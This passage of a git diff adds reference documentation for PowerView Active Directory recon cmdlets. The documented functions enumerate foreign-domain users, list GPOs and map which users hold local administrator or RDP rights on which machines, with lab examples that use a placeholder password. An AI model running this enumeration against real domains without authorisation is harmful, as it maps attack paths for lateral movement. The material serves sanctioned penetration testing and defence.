False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Properties +Specifies the properties of the output object to retrieve from the server. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SecurityMasks +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.ForeignGroupMember + +Custom PSObject with translated group member property fields. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainForeignUser.md b/docs/Recon/Get-DomainForeignUser.md new file mode 100755 index 00000000..85b00925 --- /dev/null +++ b/docs/Recon/Get-DomainForeignUser.md @@ -0,0 +1,239 @@ +# Get-DomainForeignUser + +## SYNOPSIS +Enumerates users who are in groups outside of the user's domain. +This is a domain's "outgoing" access. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-Domain, Get-DomainUser + +## SYNTAX + +``` +Get-DomainForeignUser [[-Domain] ] [-LDAPFilter ] [-Properties ] + [-SearchBase ] [-Server ] [-SearchScope ] [-ResultPageSize ] + [-ServerTimeLimit ] [-SecurityMasks ] [-Tombstone] [-Credential ] +``` + +## DESCRIPTION +Uses Get-DomainUser to enumerate all users for the current (or target) domain, +then calculates the given user's domain name based on the user's distinguishedName. +This domain name is compared to the queried domain, and the user object is +output if they differ. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainForeignUser +``` + +Return all users in the current domain who are in groups not in the +current domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainForeignUser -Domain dev.testlab.local +``` + +Return all users in the dev.testlab.local domain who are in groups not in the +dev.testlab.local domain. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainForeignUser -Domain dev.testlab.local -Server secondary.dev.testlab.local -Credential $Cred + +Return all users in the dev.testlab.local domain who are in groups not in the +dev.testlab.local domain, binding to the secondary.dev.testlab.local for queries, and +using the specified alternate credentials. + +## PARAMETERS + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Properties +Specifies the properties of the output object to retrieve from the server. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SecurityMasks +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.ForeignUser + +Custom PSObject with translated user property fields. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainGPO.md b/docs/Recon/Get-DomainGPO.md new file mode 100755 index 00000000..9d0a4685 --- /dev/null +++ b/docs/Recon/Get-DomainGPO.md @@ -0,0 +1,354 @@ +# Get-DomainGPO + +## SYNOPSIS +Return all GPOs or specific GPO objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Get-DomainComputer, Get-DomainUser, Get-DomainOU, Get-NetComputerSiteName, Get-DomainSite, Get-DomainObject, Convert-LDAPProperty + +## SYNTAX + +### None (Default) +``` +Get-DomainGPO [[-Identity] ] [-Domain ] [-LDAPFilter ] [-Properties ] + [-SearchBase ] [-Server ] [-SearchScope ] [-ResultPageSize ] + [-ServerTimeLimit ] [-SecurityMasks ] [-Tombstone] [-FindOne] [-Credential ] + [-Raw] +``` + +### ComputerIdentity +``` +Get-DomainGPO [[-Identity] ] [-ComputerIdentity ] [-Domain ] [-LDAPFilter ] + [-Properties ] [-SearchBase ] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-SecurityMasks ] [-Tombstone] [-FindOne] + [-Credential ] [-Raw] +``` + +### UserIdentity +``` +Get-DomainGPO [[-Identity] ] [-UserIdentity ] [-Domain ] [-LDAPFilter ] + [-Properties ] [-SearchBase ] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-SecurityMasks ] [-Tombstone] [-FindOne] + [-Credential ] [-Raw] +``` + +## DESCRIPTION +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. +To only return specific properies, use +"-Properties samaccountname,usnchanged,...". +By default, all GPO objects for +the current domain are returned. +To enumerate all GPOs that are applied to +a particular machine, use -ComputerName X. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainGPO -Domain testlab.local +``` + +Return all GPOs for the testlab.local domain + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainGPO -ComputerName windows1.testlab.local +``` + +Returns all GPOs applied windows1.testlab.local + +### -------------------------- EXAMPLE 3 -------------------------- +``` +"{F260B76D-55C8-46C5-BEF1-9016DD98E272}","Test GPO" | Get-DomainGPO +``` + +Return the GPOs with the name of "{F260B76D-55C8-46C5-BEF1-9016DD98E272}" and the display +name of "Test GPO" + +### -------------------------- EXAMPLE 4 -------------------------- +``` +Get-DomainGPO -LDAPFilter '(!primarygroupid=513)' -Properties samaccountname,lastlogon +``` + +### -------------------------- EXAMPLE 5 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainGPO -Credential $Cred + +## PARAMETERS + +### -Identity +A display name (e.g. +'Test GPO'), DistinguishedName (e.g. +'CN={F260B76D-55C8-46C5-BEF1-9016DD98E272},CN=Policies,CN=System,DC=testlab,DC=local'), +GUID (e.g. +'10ec320d-3111-4ef4-8faf-8f14f4adc789'), or GPO name (e.g. +'{F260B76D-55C8-46C5-BEF1-9016DD98E272}'). +Wildcards accepted. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DistinguishedName, SamAccountName, Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -ComputerIdentity +Return all GPO objects applied to a given computer identity (name, dnsname, DistinguishedName, etc.). + +```yaml +Type: String +Parameter Sets: ComputerIdentity +Aliases: ComputerName + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserIdentity +Return all GPO objects applied to a given user identity (name, SID, DistinguishedName, etc.). + +```yaml +Type: String +Parameter Sets: UserIdentity +Aliases: UserName + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Properties +Specifies the properties of the output object to retrieve from the server. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SecurityMasks +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -FindOne +Only return one result object. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: ReturnOne + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Raw +Switch. +Return raw results instead of translating the fields into a custom PSObject. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.GPO + +Custom PSObject with translated GPO property fields. + +PowerView.GPO.Raw + +The raw DirectoryServices.SearchResult object, if -Raw is enabled. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainGPOComputerLocalGroupMapping.md b/docs/Recon/Get-DomainGPOComputerLocalGroupMapping.md new file mode 100755 index 00000000..4e5015be --- /dev/null +++ b/docs/Recon/Get-DomainGPOComputerLocalGroupMapping.md @@ -0,0 +1,263 @@ +# Get-DomainGPOComputerLocalGroupMapping + +## SYNOPSIS +Takes a computer (or GPO) object and determines what users/groups are in the specified +local group for the machine through GPO correlation. + +Author: @harmj0y +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer, Get-DomainOU, Get-NetComputerSiteName, Get-DomainSite, Get-DomainGPOLocalGroup + +## SYNTAX + +### ComputerIdentity (Default) +``` +Get-DomainGPOComputerLocalGroupMapping [-ComputerIdentity] [-LocalGroup ] [-Domain ] + [-SearchBase ] [-Server ] [-SearchScope ] [-ResultPageSize ] + [-ServerTimeLimit ] [-Tombstone] [-Credential ] +``` + +### OUIdentity +``` +Get-DomainGPOComputerLocalGroupMapping -OUIdentity [-LocalGroup ] [-Domain ] + [-SearchBase ] [-Server ] [-SearchScope ] [-ResultPageSize ] + [-ServerTimeLimit ] [-Tombstone] [-Credential ] +``` + +## DESCRIPTION +This function is the inverse of Get-DomainGPOUserLocalGroupMapping, and finds what users/groups +are in the specified local group for a target machine through GPO correlation. + +If a -ComputerIdentity is specified, retrieve the complete computer object, attempt to +determine the OU the computer is a part of. +Then resolve the computer's site name with +Get-NetComputerSiteName and retrieve all sites object Get-DomainSite. +For those results, attempt to +enumerate all linked GPOs and associated local group settings with Get-DomainGPOLocalGroup. +For +each resulting GPO group, resolve the resulting user/group name to a full AD object and +return the results. +This will return the domain objects that are members of the specified +-LocalGroup for the given computer. + +Otherwise, if -OUIdentity is supplied, the same process is executed to find linked GPOs and +localgroup specifications. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainGPOComputerLocalGroupMapping -ComputerName WINDOWS3.testlab.local +``` + +Finds users who have local admin rights over WINDOWS3 through GPO correlation. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainGPOComputerLocalGroupMapping -Domain dev.testlab.local -ComputerName WINDOWS4.dev.testlab.local -LocalGroup RDP +``` + +Finds users who have RDP rights over WINDOWS4 through GPO correlation. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainGPOComputerLocalGroupMapping -Credential $Cred -ComputerIdentity SQL.testlab.local + +## PARAMETERS + +### -ComputerIdentity +A SamAccountName (e.g. +WINDOWS10$), DistinguishedName (e.g. +CN=WINDOWS10,CN=Computers,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1124), GUID (e.g. +4f16b6bc-7010-4cbf-b628-f3cfe20f6994), +or a dns host name (e.g. +windows10.testlab.local) for the computer to identity GPO local group mappings for. + +```yaml +Type: String +Parameter Sets: ComputerIdentity +Aliases: ComputerName, Computer, DistinguishedName, SamAccountName, Name + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -OUIdentity +An OU name (e.g. +TestOU), DistinguishedName (e.g. +OU=TestOU,DC=testlab,DC=local), or +GUID (e.g. +8a9ba22a-8977-47e6-84ce-8c26af4e1e6a) for the OU to identity GPO local group mappings for. + +```yaml +Type: String +Parameter Sets: OUIdentity +Aliases: OU + +Required: True +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LocalGroup +The local group to check access against. +Can be "Administrators" (S-1-5-32-544), "RDP/Remote Desktop Users" (S-1-5-32-555), +or a custom local SID. +Defaults to local 'Administrators'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Administrators +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to enumerate GPOs for, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +{{Fill SearchBase Description}} + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.GGPOComputerLocalGroupMember + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainGPOLocalGroup.md b/docs/Recon/Get-DomainGPOLocalGroup.md new file mode 100755 index 00000000..e61fb823 --- /dev/null +++ b/docs/Recon/Get-DomainGPOLocalGroup.md @@ -0,0 +1,259 @@ +# Get-DomainGPOLocalGroup + +## SYNOPSIS +Returns all GPOs in a domain that modify local group memberships through 'Restricted Groups' +or Group Policy preferences. +Also return their user membership mappings, if they exist. + +Author: @harmj0y +License: BSD 3-Clause +Required Dependencies: Get-DomainGPO, Get-GptTmpl, Get-GroupsXML, ConvertTo-SID, ConvertFrom-SID + +## SYNTAX + +``` +Get-DomainGPOLocalGroup [[-Identity] ] [-ResolveMembersToSIDs] [-Domain ] + [-LDAPFilter ] [-SearchBase ] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] [-Credential ] +``` + +## DESCRIPTION +First enumerates all GPOs in the current/target domain using Get-DomainGPO with passed +arguments, and for each GPO checks if 'Restricted Groups' are set with GptTmpl.inf or +group membership is set through Group Policy Preferences groups.xml files. +For any +GptTmpl.inf files found, the file is parsed with Get-GptTmpl and any 'Group Membership' +section data is processed if present. +Any found Groups.xml files are parsed with +Get-GroupsXML and those memberships are returned as well. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainGPOLocalGroup +``` + +Returns all local groups set by GPO along with their members and memberof. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainGPOLocalGroup -ResolveMembersToSIDs +``` + +Returns all local groups set by GPO along with their members and memberof, +and resolve any members to their domain SIDs. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +'{0847C615-6C4E-4D45-A064-6001040CC21C}' | Get-DomainGPOLocalGroup +``` + +Return any GPO-set groups for the GPO with the given name/GUID. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +Get-DomainGPOLocalGroup 'Desktops' +``` + +Return any GPO-set groups for the GPO with the given display name. + +### -------------------------- EXAMPLE 5 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainGPOLocalGroup -Credential $Cred + +## PARAMETERS + +### -Identity +A display name (e.g. +'Test GPO'), DistinguishedName (e.g. +'CN={F260B76D-55C8-46C5-BEF1-9016DD98E272},CN=Policies,CN=System,DC=testlab,DC=local'), +GUID (e.g. +'10ec320d-3111-4ef4-8faf-8f14f4adc789'), or GPO name (e.g. +'{F260B76D-55C8-46C5-BEF1-9016DD98E272}'). +Wildcards accepted. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DistinguishedName, SamAccountName, Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -ResolveMembersToSIDs +Switch. +Indicates that any member names should be resolved to their domain SIDs. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.GPOGroup + +## NOTES + +## RELATED LINKS + +[https://morgansimonsenblog.azurewebsites.net/tag/groups/](https://morgansimonsenblog.azurewebsites.net/tag/groups/) + diff --git a/docs/Recon/Get-DomainGPOUserLocalGroupMapping.md b/docs/Recon/Get-DomainGPOUserLocalGroupMapping.md new file mode 100755 index 00000000..d42a4be1 --- /dev/null +++ b/docs/Recon/Get-DomainGPOUserLocalGroupMapping.md @@ -0,0 +1,258 @@ +# Get-DomainGPOUserLocalGroupMapping + +## SYNOPSIS +Enumerates the machines where a specific domain user/group is a member of a specific +local group, all through GPO correlation. +If no user/group is specified, all +discoverable mappings are returned. + +Author: @harmj0y +License: BSD 3-Clause +Required Dependencies: Get-DomainGPOLocalGroup, Get-DomainObject, Get-DomainComputer, Get-DomainOU, Get-DomainSite, Get-DomainGroup + +## SYNTAX + +``` +Get-DomainGPOUserLocalGroupMapping [[-Identity] ] [-LocalGroup ] [-Domain ] + [-SearchBase ] [-Server ] [-SearchScope ] [-ResultPageSize ] + [-ServerTimeLimit ] [-Tombstone] [-Credential ] +``` + +## DESCRIPTION +Takes a user/group name and optional domain, and determines the computers in the domain +the user/group has local admin (or RDP) rights to. + +It does this by: + 1. +resolving the user/group to its proper SID + 2. +enumerating all groups the user/group is a current part of + and extracting all target SIDs to build a target SID list + 3. +pulling all GPOs that set 'Restricted Groups' or Groups.xml by calling + Get-DomainGPOLocalGroup + 4. +matching the target SID list to the queried GPO SID list + to enumerate all GPO the user is effectively applied with + 5. +enumerating all OUs and sites and applicable GPO GUIs are + applied to through gplink enumerating + 6. +querying for all computers under the given OUs or sites + +If no user/group is specified, all user/group -\> machine mappings discovered through +GPO relationships are returned. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Find-GPOLocation +``` + +Find all user/group -\> machine relationships where the user/group is a member +of the local administrators group on target machines. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Find-GPOLocation -UserName dfm -Domain dev.testlab.local +``` + +Find all computers that dfm user has local administrator rights to in +the dev.testlab.local domain. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Find-GPOLocation -UserName dfm -Domain dev.testlab.local +``` + +Find all computers that dfm user has local administrator rights to in +the dev.testlab.local domain. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainGPOUserLocalGroupMapping -Credential $Cred + +## PARAMETERS + +### -Identity +A SamAccountName (e.g. +harmj0y), DistinguishedName (e.g. +CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) +for the user/group to identity GPO local group mappings for. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DistinguishedName, SamAccountName, Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -LocalGroup +The local group to check access against. +Can be "Administrators" (S-1-5-32-544), "RDP/Remote Desktop Users" (S-1-5-32-555), +or a custom local SID. +Defaults to local 'Administrators'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Administrators +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to enumerate GPOs for, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +{{Fill SearchBase Description}} + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named 